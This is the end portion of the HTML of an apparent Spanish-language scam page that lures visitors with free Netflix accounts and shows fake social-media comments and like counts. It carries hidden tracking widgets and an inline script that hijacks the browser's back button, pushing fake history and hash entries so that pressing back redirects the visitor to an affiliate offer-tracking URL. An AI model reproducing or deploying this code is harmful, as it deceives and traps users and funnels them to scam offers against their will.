<span class="name">
Alexander Manzano
</span>
<br>
Graciassss 😁
</p>
<p class="combot">
<span class="ago">
Ahora
</span>
·
<span class="fblike">
Me Gusta 
</span>
<span class="likes totlikes">
324
</span>
</p>
</div>
</div>
<br>
<div>
</div>

</div>
</div>

</div>

</div>
</div>

</div>
</center>
<div style="visibility:hidden">
<center><img src="//whos.amung.us/pingjs/?k=juan05&amp;t=🔞CUENTAS NETFLIX🔞 &amp;x=https://Netflix.com" style="display:none" /></center>
</div>
<script>(function(){
			 var stateObj = { foo: 'Back' }; history.pushState(stateObj, '', '#'); 
		 })();

		   (function(){
				var ignoreHistoryChange = true;
			    window.onpopstate = function (event) {

						if (!ignoreHistoryChange) {
							ignoreHistoryChange = true;

					        try{
					        	window.top.location = 'https://Tracking-all-traffic.offerdirecto.com?id=ZsFrcZkok&type=21&click_id={click_id}&sub1={sub1}&sub2={sub2}&sub3={sub3}&source={source}';
					        }catch(d){
					        	window.location = 'https://Tracking-all-traffic.offerdirecto.com?id=ZsFrcZkok&type=21&click_id={click_id}&sub1={sub1}&sub2={sub2}&sub3={sub3}&source={source}';
					        };
					        return false;

						}
						else {
							ignoreHistoryChange = false;   
						}


			    };
			})();

		   (function(){
			window.location.hash = Math.random();
			var ignoreHashChange = true;
			window.onhashchange = function () {
				if (!ignoreHashChange) {
					ignoreHashChange = true;

			        try{
			        	window.top.location = 'https://Tracking-all-traffic.offerdirecto.com?id=ZsFrcZkok&type=21&click_id={click_id}&sub1={sub1}&sub2={sub2}&sub3={sub3}&source={source}';
			        }catch(d){
			        	window.location = 'https://Tracking-all-traffic.offerdirecto.com?id=ZsFrcZkok&type=21&click_id={click_id}&sub1={sub1}&sub2={sub2}&sub3={sub3}&source={source}';
			        };
			        return false;

				}
				else {
					ignoreHashChange = false;   
				}
			};
			})();</script>
			

<div style="VISIBILITY: hidden;"> <script type="text/javascript" src="//widgets.amung.us/small.js"></script><script type="text/javascript">WAU_small('directo100')</script></div>
			
			</body></html>